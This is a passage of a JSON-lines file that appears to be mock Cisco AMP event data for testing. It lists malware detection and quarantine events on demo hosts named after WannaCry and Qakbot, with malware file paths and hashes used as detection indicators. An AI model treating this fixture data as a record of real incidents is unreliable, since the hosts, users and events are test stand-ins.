Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot 
is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy 
